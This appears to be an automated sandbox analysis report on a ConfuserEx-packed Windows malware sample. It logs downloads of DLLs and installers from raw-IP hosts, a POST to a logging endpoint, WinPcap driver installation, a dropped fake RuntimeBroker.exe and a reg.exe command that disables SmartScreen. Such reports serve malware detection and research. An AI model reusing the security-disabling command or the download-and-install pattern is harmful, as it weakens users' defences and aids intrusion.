Source: svchost.exe, 00000019.00000003.312216541.000002196F840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.312572844.000002196F842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312236331.000002196F841000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000019.00000003.312216541.000002196F840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.312572844.000002196F842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312236331.000002196F841000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000019.00000003.312156143.000002196F861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000019.00000002.312579302.000002196F84B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312216541.000002196F840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312177604.000002196F849000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000019.00000003.312177604.000002196F849000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000019.00000002.312579302.000002196F84B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312177604.000002196F849000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000019.00000002.312579302.000002196F84B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312177604.000002196F849000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000019.00000003.312249223.000002196F855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.312572844.000002196F842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312236331.000002196F841000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000019.00000003.312156143.000002196F861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000019.00000002.312561693.000002196F83D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000019.00000003.290346723.000002196F830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000019.00000002.312561693.000002196F83D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000019.00000002.312526329.000002196F813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.312561693.000002196F83D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000019.00000003.290346723.000002196F830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000019.00000003.312230632.000002196F845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312216541.000002196F840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000019.00000003.290346723.000002196F830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000019.00000002.312554502.000002196F839000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.290346723.000002196F830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000019.00000003.312123607.000002196F850000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.312591094.000002196F856000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312249223.000002196F855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

Source: unknown

DNS traffic detected: queries for: 201.75.14.0.in-addr.arpa

Source: global traffic	HTTP traffic detected: GET /Vv/1/install_wim_tweak.dll HTTP/1.1Host: 45.135.48.153Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Vv/1/Remove.dll HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/RuntimeBroker_64.dll HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/RuntimeBrokerBin_64.dll HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/WinPcap_4_1_3.exe HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/vcredist_2010_x64.exe HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/vcredist_2013_x64.exe HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/PcapDotNet.Base_64.dll HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/PcapDotNet.Core_64.dll HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/PcapDotNet.Core.Extensions_64.dll HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/PcapDotNet.Packets_64.dll HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/PcapDotNet.Analysis_64.dll HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/Ip.json HTTP/1.1Host: 45.135.48.153Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Vv/Ip.json HTTP/1.1Host: 113.212.88.126Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Vv/resource.json HTTP/1.1Host: 113.212.88.126
Source: global traffic	HTTP traffic detected: GET /Vv/1/process.json HTTP/1.1Host: 113.212.88.126

Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.48.153

Source: unknown

HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 65Expect: 100-continueConnection: Keep-Alive

E-Banking Fraud

Install WinpCap (used to filter network traffic)

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe

File created: C:\Windows\SysWOW64\wpcap.dll

Jump to behavior

Spam, unwanted Advertisements and Ransom Demands

Install WinpCap (used to filter network traffic)

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe

File created: C:\Windows\SysWOW64\wpcap.dll

Jump to behavior

System Summary

PE file contains section with special chars

Source: ywvz5i8kT9.exe

Static PE information: section name: &#K':~`s

PE file has nameless sections

Source: ywvz5i8kT9.exe

Static PE information: section name:

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe

File created: C:\Windows\system32\drivers\npf.sys

Jump to behavior

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Code function: 0_2_00007FFF7F0302B8	0_2_00007FFF7F0302B8
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Code function: 0_2_00007FFF7F032958	0_2_00007FFF7F032958
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Code function: 0_2_00007FFF7F03503F	0_2_00007FFF7F03503F
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Code function: 0_2_00007FFF7F0328A9	0_2_00007FFF7F0328A9
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Code function: 0_2_00007FFF7F0328DA	0_2_00007FFF7F0328DA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Code function: 31_2_01008906	31_2_01008906
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Code function: 31_2_0100911E	31_2_0100911E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Code function: 31_2_01009558	31_2_01009558
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Code function: 31_2_01008286	31_2_01008286
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Code function: 31_2_0100859D	31_2_0100859D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Code function: 31_2_01008CC5	31_2_01008CC5

Source: install_wim_tweak.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WinPcap_4_1_3.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WinPcap_4_1_3.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WinPcap_4_1_3.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vcredist_2010_x64.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Uninstall.exe.30.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Uninstall.exe.30.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Uninstall.exe.30.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Setup.exe.31.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Setup.exe.31.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Setup.exe.31.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Setup.exe.31.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe

File created: C:\Windows\system32\drivers\npf.sys

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f

Source: ywvz5i8kT9.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

Source: ywvz5i8kT9.exe, type: SAMPLE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 0.2.ywvz5i8kT9.exe.f70000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 0.0.ywvz5i8kT9.exe.f70000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe

Code function: 31_2_01003972 OpenEventA,WaitForSingleObject,CloseHandle,Sleep,LoadLibraryA,GetProcAddress,WaitForSingleObject,GetLastError,InitiateSystemShutdownA,GetLastError,WaitForSingleObject,GetLastError,GetVersionExA,GetVersionExA,GetVersionExA,GetSystemDirectoryA,strchr,CreateFileA,FlushFileBuffers,CloseHandle,NtShutdownSystem,FreeLibrary,

31_2_01003972

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe

File created: C:\Windows\SysWOW64\RuntimeBroker.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: String function: 012AF6A2 appears 35 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: String function: 012B540B appears 73 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: String function: 012AFA86 appears 501 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: String function: 012B177A appears 55 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: String function: 012B294E appears 369 times

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Code function: 31_2_01003972 OpenEventA,WaitForSingleObject,CloseHandle,Sleep,LoadLibraryA,GetProcAddress,WaitForSingleObject,GetLastError,InitiateSystemShutdownA,GetLastError,WaitForSingleObject,GetLastError,GetVersionExA,GetVersionExA,GetVersionExA,GetSystemDirectoryA,strchr,CreateFileA,FlushFileBuffers,CloseHandle,NtShutdownSystem,FreeLibrary,	31_2_01003972
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Code function: 31_2_0100358B NtOpenProcessToken,NtAdjustPrivilegesToken,NtClose,NtClose,	31_2_0100358B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Code function: 31_2_010034F4 NtOpenProcessToken,NtAdjustPrivilegesToken,NtClose,NtClose,	31_2_010034F4

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe

Code function: 31_2_01002B13: GetDriveTypeA,CreateFileA,DeviceIoControl,CloseHandle,

31_2_01002B13

Source: WinPcap_4_1_3.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: Uninstall.exe.30.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: SetupResources.dll.31.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: RuntimeBroker.exe0.0.dr	Static PE information: No import functions for PE file found
Source: SetupResources.dll0.31.dr	Static PE information: No import functions for PE file found
Source: SetupResources.dll7.31.dr	Static PE information: No import functions for PE file found
Source: SetupResources.dll5.31.dr	Static PE information: No import functions for PE file found
Source: RuntimeBroker.exe.0.dr	Static PE information: No import functions for PE file found
Source: SetupResources.dll2.31.dr	Static PE information: No import functions for PE file found
Source: SetupResources.dll4.31.dr	Static PE information: No import functions for PE file found
Source: SetupResources.dll.31.dr	Static PE information: No import functions for PE file found
Source: SetupResources.dll1.31.dr	Static PE information: No import functions for PE file found
Source: SetupResources.dll6.31.dr	Static PE information: No import functions for PE file found
Source: SetupResources.dll3.31.dr	Static PE information: No import functions for PE file found
Source: SetupResources.dll8.31.dr	Static PE information: No import functions for PE file found

Source: ywvz5i8kT9.exe	Binary or memory string: OriginalFilename vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.494015900.000000000352F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePcapDotNet.Core.Extensions.dllX vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.493961459.0000000003504000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePcapDotNet.Base.dll@ vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePcapDotNet.Packets.dll0 vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePcapDotNet.Analysis.dllH vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorlib.dllT vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ,\\StringFileInfo\\040904B0\\OriginalFilename vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVvFile.exe. vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ,\\StringFileInfo\\000004B0\\OriginalFilename vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.dllT vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Core.dllT vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Xml.dllT vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Management.dllT vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.492129781.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.493875825.00000000034C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVvSvcHost.exe4 vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.493875825.00000000034C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRuntimeBroker.exe0 vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.493794845.00000000034A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameinstall_wim_tweak.exeL vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000000.224128196.0000000000F7C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVvFile.exe. vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.491493366.0000000000F7D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVvFile.exe. vs ywvz5i8kT9.exe
Source: ywvz5i8kT9.exe	Binary or memory string: OriginalFilenameVvFile.exe. vs ywvz5i8kT9.exe

Source: ywvz5i8kT9.exe	Static PE information: Section: &#K':~`s ZLIB complexity 1.00059442935
Source: vcredist_2010_x64.exe.0.dr	Static PE information: Section: .rsrc ZLIB complexity 0.999192116477

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\system32

Jump to behavior

Source: Packet.dll0.30.dr	Binary string: HH:mm:ssdddd, MMMM dd, yyyyMM/dd/yyPMAMDecemberNovemberOctoberSeptemberAugustJulyJuneAprilMarchFebruaryJanuaryDecNovOctSepAugJulJunMayAprMarFebJanSaturdayFridayThursdayWednesdayTuesdayMondaySundaySatFriThuWedTueMonSunGetProcessWindowStationGetUserObjectInformationAGetLastActivePopupGetActiveWindowMessageBoxAUSER32.DLLCONOUT$SunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecNPF_%SSYSTEM\CurrentControlSet\Services\Tcpip\Parameters\InterfacesSYSTEM\CurrentControlSet\ServicesParametersTcpIpUseZeroBroadcastEnableDHCPDhcpIPAddressDhcpSubnetMaskIPAddressSubnetMask\Device\NPF_1394%s%sSYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}ComponentIdLinkageExportSYSTEM\CurrentControlSet\Services\Tcpip\Linkagebinddrivers\NPF.sysIphlpapiGetAdaptersAddressesairpcap.dllAirpcapGetLastErrorAirpcapGetDeviceListAirpcapFreeDeviceListAirpcapOpenAirpcapCloseAirpcapGetLinkTypeAirpcapSetKernelBufferAirpcapSetFilterAirpcapGetMacAddressAirpcapSetMinToCopyAirpcapGetReadEventAirpcapReadAirpcapGetStatsAirpcapWriteWinPcap Packet Driver (NPF)system32\drivers\NPF.sys\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileVersionSYSTEM\CurrentControlSet\Services\%s\\.\%s\\.\Global\%s%wsRSDS=
Source: Packet.dll0.30.dr	Binary string: \Device\NPF_
Source: PcapDotNet.Core.Extensions.dll.0.dr	Binary string: (rpcap://\Device\NPF_
Source: PcapDotNet.Core.Extensions.dll.0.dr	Binary string: <Module>PcapDotNet.Core.Extensions.dllLivePacketDeviceExtensionsPcapDotNet.Core.ExtensionsPacketCommunicatorExtensionsmscorlibSystemObjectNamePrefixNetworkConnectionConfigKeyPcapDotNet.CoreLivePacketDeviceGetGuidGetPnpDeviceIdSystem.Net.NetworkInformationNetworkInterfaceGetNetworkInterfacePcapDotNet.PacketsPcapDotNet.Packets.EthernetMacAddressGetMacAddressGetMacAddressWmiSystem.Collections.GenericIEnumerable`1PacketPacketCommunicatorReceivePacketslivePacketDevicecommunicatorcountSystem.Runtime.VersioningTargetFrameworkAttribute.ctorSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyConfigurationAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyCultureAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeAssemblyVersionAttributeAssemblyFileVersionAttributeCLSCompliantAttributeSystem.DiagnosticsDebuggableAttributeDebuggingModesSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.CoreExtensionAttributeSystem.Diagnostics.CodeAnalysisSuppressMessageAttributeArgumentNullExceptionPacketDeviceget_NameStringStringComparisonStartsWithSystem.GlobalizationCultureInfoget_InvariantCultureIFormatProviderFormatInvalidOperationExceptionget_LengthSubstringMicrosoft.Win32RegistryRegistryKeyLocalMachineConcatOpenSubKeyGetValueIDisposableDispose<>c__DisplayClass1guid<GetNetworkInterface>b__0networkInterfaceget_Idop_EqualityGetAllNetworkInterfacesFunc`2System.LinqEnumerableFirstOrDefaultPhysicalAddressGetPhysicalAddressGetAddressBytesByteArrayExtensionsPcapDotNet.BaseUInt48EndianityReadUInt48ReplaceSystem.ManagementManagementScopeConnectSelectQueryManagementObjectSearcherObjectQueryManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentManagementObjectget_ItemIsNullOrEmptyMoveNextCompilerGeneratedAttribute<ReceivePackets>d__0System.CollectionsIEnumerableIEnumerator`1IEnumeratorSystem.Collections.Generic.IEnumerable<PcapDotNet.Packets.Packet>.GetEnumeratorSystem.Collections.IEnumerable.GetEnumerator<>2__currentSystem.Collections.Generic.IEnumerator<PcapDotNet.Packets.Packet>.get_CurrentSystem.Collections.IEnumerator.ResetResetSystem.IDisposable.Dispose<>1__state<>l__initialThreadIdSystem.Collections.IEnumerator.get_Current<>3__communicator<>3__countList`1<packets>5__1<countGot>5__2PacketCommunicatorReceiveResult<result>5__3<packet>5__4Enumerator<>7__wrap5<>m__Finally6System.Collections.Generic.IEnumerator<PcapDotNet.Packets.Packet>.CurrentSystem.Collections.IEnumerator.CurrentDebuggerHiddenAttributeSystem.ThreadingThreadget_CurrentThreadget_ManagedThreadIdMathMaxMinClearAddHandlePacketReceiveSomePacketsNotSupportedException!livePacketDevice)rpcap://\Device\NPF_qInvalid Device Name format: {0} (should start with: {1})
